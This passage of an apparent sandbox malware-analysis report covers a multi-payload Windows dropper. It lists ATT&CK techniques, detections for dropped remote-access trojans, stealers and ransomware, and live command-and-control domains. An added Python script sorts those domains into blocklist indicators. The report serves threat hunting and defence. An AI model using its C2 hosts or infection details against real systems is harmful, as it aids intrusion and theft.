Persistence: 1 DLL Side-Loading; 2 Windows Service; 2 Scheduled Task/Job; 221 Registry Run Keys / Startup Folder
Privilege Escalation: 1 DLL Side-Loading; 2 Windows Service; 212 Process Injection; 2 Scheduled Task/Job; 221 Registry Run Keys / Startup Folder
Defense Evasion: 21 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 141 Obfuscated Files or Information; 15 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 22 Masquerading; 21 Virtualization/Sandbox Evasion; 212 Process Injection; 1 Hidden Files and Directories
Credential Access: 121 Input Capture
Discovery: 1 System Time Discovery; 1 Peripheral Device Discovery; 1 File and Directory Discovery; 14 System Information Discovery; 1 Query Registry; 221 Security Software Discovery; 2 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Remote System Discovery; 1 System Network Configuration Discovery
Lateral Movement: 1 Replication Through Removable Media
Collection: 11 Archive Collected Data; 121 Input Capture
Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 3 Remote Access Software; 2 Non-Application Layer Protocol; 112 Application Layer Protocol
Behavior Graph ID: 585264; Sample: RIP_YOUR_PC_LOL.exe; Startdate: 08/03/2022; Architecture: WINDOWS; Score: 100

Submitted sample

Source | Detection | Scanner | Label | Link
RIP_YOUR_PC_LOL.exe | 63% | Virustotal | | Browse
RIP_YOUR_PC_LOL.exe | 33% | Metadefender | | Browse
RIP_YOUR_PC_LOL.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos |
RIP_YOUR_PC_LOL.exe | 100% | Avira | TR/AD.MExecute.lzrac |
RIP_YOUR_PC_LOL.exe | 100% | Avira | SPR/Tool.MailPassView.473 |
RIP_YOUR_PC_LOL.exe | 100% | Avira | TR/AD.MalwareCrypter.rrsdk |
RIP_YOUR_PC_LOL.exe | 100% | Avira | TR/Dropper.GR |
RIP_YOUR_PC_LOL.exe | 100% | Avira | TR/Agent.aagt |
RIP_YOUR_PC_LOL.exe | 100% | Avira | TR/AD.RedLineSteal.cjshc |
RIP_YOUR_PC_LOL.exe | 100% | Avira | TR/Dropper.MSIL.Gen7 |
RIP_YOUR_PC_LOL.exe | 100% | Joe Sandbox ML | |

Dropped files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Roaming\Opus.exe | 100% | Avira | TR/Dropper.MSIL.Gen7 |
C:\Users\user\AppData\Roaming\mediaget.exe | 100% | Avira | TR/ATRAPS.Gen |
C:\Users\user\AppData\Roaming\___11.19.exe | 100% | Avira | TR/Dropper.GR |
C:\Users\user\AppData\Roaming\___11.19.exe | 100% | Avira | TR/Agent.aagt |
C:\Users\user\AppData\Roaming\healastounding.exe | 100% | Avira | TR/AD.RedLineSteal.cjshc |
C:\Users\user\AppData\Roaming\healastounding.exe | 100% | Avira | TR/Dropper.MSIL.Gen7 |
C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | 100% | Avira | TR/AD.MalwareCrypter.rrsdk |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | Avira | TR/Dropper.MSIL.Gen7 |
C:\Windows\Help\active_desktop_render.dll | 100% | Avira | HEUR/AGEN.1245024 |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | 100% | Avira | TR/ATRAPS.Gen |
C:\Users\user\AppData\Roaming\gay.exe | 100% | Avira | TR/ATRAPS.Gen |
C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Roaming\22.exe | 100% | Avira | HEUR/AGEN.1227810 |
C:\Users\user\AppData\Roaming\Pluto Panel.exe | 100% | Avira | TR/AD.MExecute.lzrac |
C:\Users\user\AppData\Roaming\Pluto Panel.exe | 100% | Avira | SPR/Tool.MailPassView.473 |
C:\Windows\Cursors\WUDFhosts.exe | 100% | Avira | HEUR/AGEN.1213003 |
C:\Users\user\AppData\Roaming\a.exe | 100% | Avira | TR/AD.RedLineSteal.cjshc |
C:\Users\user\AppData\Roaming\3.exe | 100% | Avira | HEUR/AGEN.1203070 |
C:\Users\user\AppData\Roaming\test.exe | 100% | Avira | TR/Dropper.Gen |
C:\Users\user\AppData\Roaming\aaa.exe | 100% | Avira | TR/Dropper.MSIL.Gen |
C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Opus.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\mediaget.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\___11.19.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\healastounding.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\4.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | Joe Sandbox ML | |
C:\Windows\Help\active_desktop_render.dll | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\gay.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\22.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Pluto Panel.exe | 100% | Joe Sandbox ML | |
C:\Windows\Cursors\WUDFhosts.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\a.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\3.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\test.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\aaa.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 85% | Metadefender | | Browse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore |
C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe | 29% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe | 86% | ReversingLabs | Win32.Trojan.Fragtor |
C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe | 29% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe | 86% | ReversingLabs | Win32.Infostealer.Azorult |
C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | 29% | Metadefender | | Browse
C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | 92% | ReversingLabs | Win32.Ransomware.StopCrypt |
C:\Users\user\AppData\Roaming\22.exe | 38% | Metadefender | | Browse
C:\Users\user\AppData\Roaming\22.exe | 86% | ReversingLabs | Win32.Trojan.BlackMoon |
C:\Users\user\AppData\Roaming\3.exe | 47% | Metadefender | | Browse
C:\Users\user\AppData\Roaming\3.exe | 82% | ReversingLabs | ByteCode-MSIL.Trojan.SpyNoon |
C:\Users\user\AppData\Roaming\4.exe | 17% | Metadefender | | Browse
C:\Users\user\AppData\Roaming\4.exe | 75% | ReversingLabs | Win32.Trojan.SpyNoon |
                    C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe26%MetadefenderBrowse
                    C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe86%ReversingLabsWin32.Infostealer.Azorult
Source | Detection | Scanner | Label
11.0.22.exe.400000.12.unpack | 100% | Avira | HEUR/AGEN.1227810
9.2.Opus.exe.840000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.4.unpack | 100% | Avira | TR/Dropper.Gen
7.0.0fd7de5367376231a788872005d7ed4f.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1242347
4.0.healastounding.exe.900000.4.unpack | 100% | Avira | TR/AD.RedLineSteal.cjshc
4.0.healastounding.exe.900000.4.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
5.0.Pluto Panel.exe.f10000.8.unpack | 100% | Avira | TR/AD.MExecute.lzrac
5.0.Pluto Panel.exe.f10000.8.unpack | 100% | Avira | SPR/Tool.MailPassView.473
9.0.Opus.exe.840000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
5.2.Pluto Panel.exe.f10000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
5.2.Pluto Panel.exe.f10000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.2.unpack | 100% | Avira | TR/Dropper.Gen
12.2.aaa.exe.2c0000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen
8.0.gay.exe.d0000.2.unpack | 100% | Avira | TR/ATRAPS.Gen
12.0.aaa.exe.2c0000.2.unpack | 100% | Avira | TR/Dropper.MSIL.Gen
0.3.RIP_YOUR_PC_LOL.exe.57b3478.6.unpack | 100% | Avira | TR/Patched.Ren.Gen
7.0.0fd7de5367376231a788872005d7ed4f.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1242347
11.0.22.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227810
0.2.RIP_YOUR_PC_LOL.exe.5755c99.18.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
11.0.22.exe.457136.14.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack | 100% | Avira | TR/Inject.vcoldi
14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.3.unpack | 100% | Avira | TR/Dropper.Gen
6.2.test.exe.da0000.0.unpack | 100% | Avira | TR/Dropper.Gen
8.2.gay.exe.d0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
12.0.aaa.exe.2c0000.1.unpack | 100% | Avira | TR/Dropper.MSIL.Gen
4.2.healastounding.exe.900000.0.unpack | 100% | Avira | TR/AD.RedLineSteal.cjshc
4.2.healastounding.exe.900000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.1.unpack | 100% | Avira | TR/Dropper.Gen
4.0.healastounding.exe.900000.0.unpack | 100% | Avira | TR/AD.RedLineSteal.cjshc
4.0.healastounding.exe.900000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.6.unpack | 100% | Avira | TR/Dropper.Gen
9.2.Opus.exe.5b00000.7.unpack | 100% | Avira | TR/NanoCore.fadte
14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.5.unpack | 100% | Avira | TR/Dropper.Gen
11.0.22.exe.457136.21.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
0.1.RIP_YOUR_PC_LOL.exe.dda1e2.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.9.unpack | 100% | Avira | TR/Dropper.Gen
0.2.RIP_YOUR_PC_LOL.exe.e387f7.8.unpack | 100% | Avira | TR/Patched.Ren.Gen
11.0.22.exe.400000.6.unpack | 100% | Avira | HEUR/AGEN.1227810
6.0.test.exe.da0000.0.unpack | 100% | Avira | TR/Dropper.Gen
17.0.mediaget.exe.ab0000.3.unpack | 100% | Avira | TR/ATRAPS.Gen
0.2.RIP_YOUR_PC_LOL.exe.d587a1.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
11.0.22.exe.43de6f.2.unpack | 100% | Avira | HEUR/AGEN.1245024
17.0.mediaget.exe.ab0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
11.0.22.exe.43de6f.19.unpack | 100% | Avira | HEUR/AGEN.1245024
11.0.22.exe.457136.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
9.0.Opus.exe.840000.3.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
11.0.22.exe.400000.18.unpack | 100% | Avira | HEUR/AGEN.1227810
14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.8.unpack | 100% | Avira | TR/Dropper.Gen
11.0.22.exe.43de6f.13.unpack | 100% | Avira | HEUR/AGEN.1245024
14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.10.unpack | 100% | Avira | TR/Dropper.Gen
0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack | 100% | Avira | TR/Inject.vcoldi
17.2.mediaget.exe.ab0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.7.unpack | 100% | Avira | TR/Dropper.Gen
0.3.RIP_YOUR_PC_LOL.exe.5839748.8.unpack | 100% | Avira | HEUR/AGEN.1227785
9.0.Opus.exe.840000.1.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
8.0.gay.exe.d0000.1.unpack | 100% | Avira | TR/ATRAPS.Gen
8.0.gay.exe.d0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
11.0.22.exe.457136.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack | 100% | Avira | TR/Patched.Ren.Gen
4.2.healastounding.exe.4582ffa.11.unpack | 100% | Avira | TR/Dropper.Gen
11.0.22.exe.43de6f.7.unpack | 100% | Avira | HEUR/AGEN.1245024
0.0.RIP_YOUR_PC_LOL.exe.e387f7.8.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.0.RIP_YOUR_PC_LOL.exe.dda1e2.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
12.0.aaa.exe.2c0000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen
0.2.RIP_YOUR_PC_LOL.exe.56d4258.19.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
17.0.mediaget.exe.ab0000.1.unpack | 100% | Avira | TR/ATRAPS.Gen
0.1.RIP_YOUR_PC_LOL.exe.d587a1.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
0.2.RIP_YOUR_PC_LOL.exe.dda1e2.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.0.healastounding.exe.900000.12.unpack | 100% | Avira | TR/AD.RedLineSteal.cjshc
4.0.healastounding.exe.900000.12.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
0.3.RIP_YOUR_PC_LOL.exe.5956fd2.3.unpack | 100% | Avira | TR/Dropper.Gen
7.0.0fd7de5367376231a788872005d7ed4f.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1242347
6.0.test.exe.da0000.2.unpack | 100% | Avira | TR/Dropper.Gen
5.0.Pluto Panel.exe.f10000.4.unpack | 100% | Avira | TR/AD.MExecute.lzrac
5.0.Pluto Panel.exe.f10000.4.unpack | 100% | Avira | SPR/Tool.MailPassView.473
0.0.RIP_YOUR_PC_LOL.exe.d587a1.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
5.0.Pluto Panel.exe.f10000.12.unpack | 100% | Avira | TR/AD.MExecute.lzrac
5.0.Pluto Panel.exe.f10000.12.unpack | 100% | Avira | SPR/Tool.MailPassView.473
5.0.Pluto Panel.exe.f10000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
5.0.Pluto Panel.exe.f10000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
6.0.test.exe.da0000.3.unpack | 100% | Avira | TR/Dropper.Gen
0.2.RIP_YOUR_PC_LOL.exe.5821276.21.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.1.RIP_YOUR_PC_LOL.exe.e387f7.7.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.unpack | 100% | Avira | TR/Dropper.Gen
0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.unpack | 100% | Avira | TR/Dropper.Gen
7.2.0fd7de5367376231a788872005d7ed4f.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1242347
12.0.aaa.exe.2c0000.3.unpack | 100% | Avira | TR/Dropper.MSIL.Gen
0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack | 100% | Avira | TR/Inject.vcoldi
7.2.0fd7de5367376231a788872005d7ed4f.exe.24f15a0.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.11.unpack | 100% | Avira | TR/Dropper.Gen
0.1.RIP_YOUR_PC_LOL.exe.ea57bf.8.unpack | 100% | Avira | TR/Patched.Ren.Gen
14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
4.2.healastounding.exe.44c50a8.8.unpack | 100% | Avira | TR/Dropper.Gen
0.2.RIP_YOUR_PC_LOL.exe.57b42ae.20.unpack | 100% | Avira | TR/Patched.Ren.Gen
7.0.0fd7de5367376231a788872005d7ed4f.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1242347
17.0.mediaget.exe.ab0000.2.unpack | 100% | Avira | TR/ATRAPS.Gen
9.0.Opus.exe.840000.2.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
8.0.gay.exe.d0000.3.unpack | 100% | Avira | TR/ATRAPS.Gen
4.0.healastounding.exe.900000.8.unpack | 100% | Avira | TR/AD.RedLineSteal.cjshc
4.0.healastounding.exe.900000.8.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
                    No Antivirus matches
Source | Detection | Scanner | Label
http://www.tiro.com= | 0% | Avira URL Cloud | safe
http://www.urwpp.derasg | 0% | Avira URL Cloud | safe
http://www.fontbureau.comd& | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.sakkal.comm | 0% | Avira URL Cloud | safe
http://www.fontbureau.comlicd | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/) | 0% | URL Reputation | safe
http://www.ascendercorp.com/typedesigners.html | 0% | URL Reputation | safe
http://www.tiro.com& | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://schemas.microsof | 0% | URL Reputation | safe
http://www.i. | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/X | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Q | 0% | URL Reputation | safe
http://www.carterandcone.comY | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cno.W | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/J | 0% | URL Reputation | safe
http://www.zhongyicts.com.cnm | 0% | URL Reputation | safe
http://www.carterandcone.comt | 0% | URL Reputation | safe
http://www.founder.com.cn/cncz | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe
http://www.zhongyicts.co | 0% | Avira URL Cloud | safe
http://www.fonts.comC | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/jp/) | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/eu-e | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/n | 0% | URL Reputation | safe
http://www.zhongyicts.com.cnY | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/i | 0% | URL Reputation | safe
http://www.fontbureau.comitu | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/g | 0% | URL Reputation | safe
http://www.freeeim.com/D | 0% | Avira URL Cloud | safe
http://www.tiro.comic | 0% | URL Reputation | safe
http://www.founder.com.cn/cncz$ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn$ | 0% | URL Reputation | safe
http://www.carterandcone.comkC | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ls | 0% | Avira URL Cloud | safe
http://www.fontbureau.comFX | 0% | Avira URL Cloud | safe
http://www.urwpp.deMTq | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/jp/C | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/jp/J | 0% | URL Reputation | safe
http://www.founder.com.cn/cnT | 0% | URL Reputation | safe
http://www.zhongyicts.com.cnts | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.com | 0% | URL Reputation | safe
http://www.fontbureau.comoX | 0% | Avira URL Cloud | safe
http://www.carterandcone.com. | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cnv | 0% | URL Reputation | safe
http://www.fontbureau.comrsiv | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.de | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.carterandcone.como.W | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/jp/X | 0% | URL Reputation | safe
http://www.fontbureau.comonyn | 0% | Avira URL Cloud | safe
http://www.fontbureau.comF | 0% | URL Reputation | safe
http://www.fontbureau.comsiv/C | 0% | Avira URL Cloud | safe
http://www.carterandcone.comTC | 0% | URL Reputation | safe
http://ocsp.thawte.com0 | 0% | URL Reputation | safe
http://www.founder.com.cp | 0% | Avira URL Cloud | safe
http://www.urwpp.deR | 0% | Avira URL Cloud | safe
http://www.fontbureau.comtu | 0% | Avira URL Cloud | safe
https://whatismyipaddress.comx& | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
http://www.fontbureau.coma | 0% | URL Reputation | safe
http://www.fontbureau.comd | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
kazya1.hopto.org | 41.249.51.34 | true | false | | high
yabynennet.xyz | 45.129.99.212 | true | false | | high
api.ipify.org.herokudns.com | 52.20.78.240 | true | false | | high
whatismyipaddress.com | 104.16.154.36 | true | false | | high
pool.usa-138.com | 220.86.85.75 | true | false | | high
hackerinvasion.f3322.net | 127.0.0.1 | true | false | | high
us-east-1.route-1000.000webhost.awex.io | 145.14.144.149 | true | false | | high
gfhhjgh.duckdns.org | 179.13.1.253 | true | false | | high
files.000webhost.com | unknown | unknown | false | | high
22ssh.com | unknown | unknown | false | | high
123.105.12.0.in-addr.arpa | unknown | unknown | false | | high
store-images.s-microsoft.com | unknown | unknown | false | | high
pretorian.ac.ug | unknown | unknown | false | | high
api.ip.sb | unknown | unknown | false | | high
api.ipify.org | unknown | unknown | false | | high
prepepe.ac.ug | unknown | unknown | false | | high
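The domain table above is the part of this report an analyst turns into hunting indicators first: three dynamic-DNS names (hopto.org, duckdns.org, f3322.net), three public-IP echo services (api.ipify.org and its herokudns.com CNAME target, whatismyipaddress.com, api.ip.sb), a reverse-lookup name, and one dynamic-DNS name that resolved to 127.0.0.1 during the run. The script below is an added example and not part of the Joe Sandbox report; it tags each row with those categories and picks out the dynamic-DNS names that were live during analysis. The rows are copied from the table above; the dynamic-DNS suffix list and the IP-echo host list are assumptions made for this example, not data from the report.

```python
"""Triage helper for the resolved-domain table of a sandbox report.

Added example, not code from the Joe Sandbox report: it turns the
domain rows of the report into hunting indicators by tagging
dynamic-DNS hosts, public-IP echo services, reverse lookups and
names that resolve to loopback.  The suffix and service lists are
assumptions made for this example, not data from the report.
"""
import ipaddress

# Rows copied from the report's domain table: (name, resolved IP or "unknown").
REPORT_DOMAINS = [
    ("kazya1.hopto.org", "41.249.51.34"),
    ("yabynennet.xyz", "45.129.99.212"),
    ("api.ipify.org.herokudns.com", "52.20.78.240"),
    ("whatismyipaddress.com", "104.16.154.36"),
    ("pool.usa-138.com", "220.86.85.75"),
    ("hackerinvasion.f3322.net", "127.0.0.1"),
    ("us-east-1.route-1000.000webhost.awex.io", "145.14.144.149"),
    ("gfhhjgh.duckdns.org", "179.13.1.253"),
    ("files.000webhost.com", "unknown"),
    ("22ssh.com", "unknown"),
    ("123.105.12.0.in-addr.arpa", "unknown"),
    ("store-images.s-microsoft.com", "unknown"),
    ("pretorian.ac.ug", "unknown"),
    ("api.ip.sb", "unknown"),
    ("api.ipify.org", "unknown"),
    ("prepepe.ac.ug", "unknown"),
]

# Assumed: common dynamic-DNS providers.  The report itself only shows
# hopto.org, duckdns.org and f3322.net; the others are added for coverage.
DYNAMIC_DNS_SUFFIXES = ("hopto.org", "duckdns.org", "f3322.net", "no-ip.org", "ddns.net")

# Assumed: services malware queries to learn the victim's public IP.
IP_ECHO_HOSTS = ("api.ipify.org", "whatismyipaddress.com", "api.ip.sb")


def _matches(host, base):
    """True for the host itself, a subdomain of it, or a CNAME target that
    still carries the original name as a prefix (api.ipify.org.herokudns.com)."""
    return host == base or host.endswith("." + base) or host.startswith(base + ".")


def classify(name, ip):
    """Return the list of tags that apply to one (name, ip) row, in a fixed order."""
    host = name.lower().rstrip(".")
    tags = []
    if host.endswith(".in-addr.arpa"):
        tags.append("reverse-lookup")
    if any(_matches(host, s) for s in DYNAMIC_DNS_SUFFIXES):
        tags.append("dynamic-dns")
    if any(_matches(host, h) for h in IP_ECHO_HOSTS):
        tags.append("ip-echo")
    if ip == "unknown":
        tags.append("unresolved")
    else:
        addr = ipaddress.ip_address(ip)
        if addr.is_loopback:
            # A dynamic-DNS name pointed at 127.0.0.1 usually means the
            # operator parked it or the provider sinkholed it; the lookup
            # itself is still a usable detection.
            tags.append("resolves-to-loopback")
        elif addr.is_private:
            tags.append("resolves-to-private")
    return tags


def triage(rows):
    """Group domain names by tag, preserving the report's row order."""
    grouped = {}
    for name, ip in rows:
        for tag in classify(name, ip):
            grouped.setdefault(tag, []).append(name)
    return grouped


def live_dynamic_dns(rows):
    """Dynamic-DNS names that resolved to a routable address during the run.
    These were reachable C2 candidates at analysis time and go to the
    blocklist first; parked/loopback ones are excluded here."""
    return [
        name for name, ip in rows
        if "dynamic-dns" in classify(name, ip)
        and ip != "unknown"
        and ipaddress.ip_address(ip).is_global
    ]


if __name__ == "__main__":
    for tag, names in triage(REPORT_DOMAINS).items():
        print(f"{tag}: {', '.join(names)}")
    print("live dynamic DNS:", ", ".join(live_dynamic_dns(REPORT_DOMAINS)))
```

The loopback case matters in practice: hackerinvasion.f3322.net answered with 127.0.0.1, so a block on the resolved IP would do nothing, but the DNS query for the name is still a high-confidence indicator. Matching on a name prefix as well as a suffix is what lets the CNAME target api.ipify.org.herokudns.com be recognised as the same IP-echo lookup as api.ipify.org.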
Name | Malicious | Antivirus Detection | Reputation
http://api.ipify.org/?format=xml | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.tiro.com= | Pluto Panel.exe, 00000005.00000003.445903668.0000000005C80000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.urwpp.derasg | Pluto Panel.exe, 00000005.00000003.494373371.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.493190429.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.497114575.0000000005C80000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comd& | Pluto Panel.exe, 00000005.00000003.539432667.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.561809650.0000000005C54000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designers | Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sajatypeworks.com | Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.comm | Pluto Panel.exe, 00000005.00000003.461535327.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.462539198.0000000005C80000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
